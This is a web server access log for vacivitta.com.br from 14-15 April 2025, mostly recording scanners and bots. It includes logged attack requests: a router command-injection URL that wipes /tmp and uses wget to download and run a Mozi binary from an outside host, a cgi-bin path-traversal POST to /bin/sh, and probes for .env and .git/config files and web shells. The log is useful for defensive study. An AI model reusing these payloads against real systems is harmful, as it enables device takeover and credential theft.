181.143.78.154 - - [14/Apr/2025:12:36:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
45.230.66.17 - - [14/Apr/2025:12:39:52 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.17:10078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:12:40:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:12:45:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
209.38.27.119 - - [14/Apr/2025:12:52:57 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:12:52:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
2.58.56.157 - - [14/Apr/2025:13:07:17 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:13:19:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:13:27:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:13:28:29 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:13:41:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:13:42:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:13:49:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:27 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:27 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:28 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:28 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:29 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:29 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:29 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:30 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:30 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
143.110.168.25 - - [14/Apr/2025:13:57:30 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:14:00:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:14:18:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:14:19:40 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
192.227.158.8 - - [14/Apr/2025:14:30:19 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:14:37:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:14:40:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:14:53:03 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:15:04:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:15:10:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:15:27:23 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:15:39:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:15:58:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [14/Apr/2025:16:01:04 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:16:03:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:16:23:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [14/Apr/2025:16:25:28 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
vacivitta.com.br:80
68.168.211.10 - - [14/Apr/2025:16:36:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:16:46:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
205.210.31.243 - - [14/Apr/2025:16:55:23 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:16:57:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:16:57:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [14/Apr/2025:16:58:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:17:09:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.114 - - [14/Apr/2025:17:12:36 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
198.235.24.114 - - [14/Apr/2025:17:12:36 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
209.38.27.119 - - [14/Apr/2025:17:19:37 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
34.34.173.16 - - [14/Apr/2025:17:24:08 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
93.174.93.12 - - [14/Apr/2025:17:25:08 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:17:33:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
2.58.56.157 - - [14/Apr/2025:17:50:05 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
185.247.137.220 - - [14/Apr/2025:17:51:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
vacivitta.com.br:80
87.236.176.88 - - [14/Apr/2025:17:51:09 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:17:52:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:18:06:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:18:08:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.91.127.81 - - [14/Apr/2025:18:15:40 -0300] "CONNECT pro.ip-api.com:443 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:18:23:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:18:32:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:18:51:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:19:12:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:19:17:41 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:19:34:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:19:36:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:19:48:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.45.33.37 - - [14/Apr/2025:19:49:53 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
134.122.33.158 - - [14/Apr/2025:19:54:52 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
134.122.33.158 - - [14/Apr/2025:19:54:52 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
124.154.102.247 - - [14/Apr/2025:19:56:49 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:20:01:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
59.127.14.28 - - [14/Apr/2025:20:18:03 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:20:18:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:20:31:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:20:36:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:20:47:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.230.66.29 - - [14/Apr/2025:20:53:36 -0300] "POST /HNAP1/ HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:21:07:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:21:23:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [14/Apr/2025:21:32:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [14/Apr/2025:21:42:03 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:21:44:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:21:45:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:21:50:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:21:55:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:21:56:17 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:22:26:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:22:37:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [14/Apr/2025:22:38:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [14/Apr/2025:23:03:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:23:05:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [14/Apr/2025:23:08:48 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:23:24:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
135.19.154.217 - - [14/Apr/2025:23:34:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [14/Apr/2025:23:50:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:00:03:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:00:13:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:00:20:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:00:31:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:00:42:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [15/Apr/2025:00:45:57 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
14.103.236.102 - - [15/Apr/2025:01:05:19 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:01:09:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:01:11:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:01:33:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:01:36:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:01:44:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.171.29.66 - - [15/Apr/2025:01:44:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:01:44:09 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
125.138.200.15 - - [15/Apr/2025:01:55:11 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:02:02:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:02:23:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:02:29:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
